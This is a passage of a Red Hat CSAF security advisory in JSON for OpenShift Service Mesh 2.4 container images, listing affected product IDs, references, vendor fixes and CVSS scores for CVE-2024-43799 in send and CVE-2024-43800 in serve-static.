"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
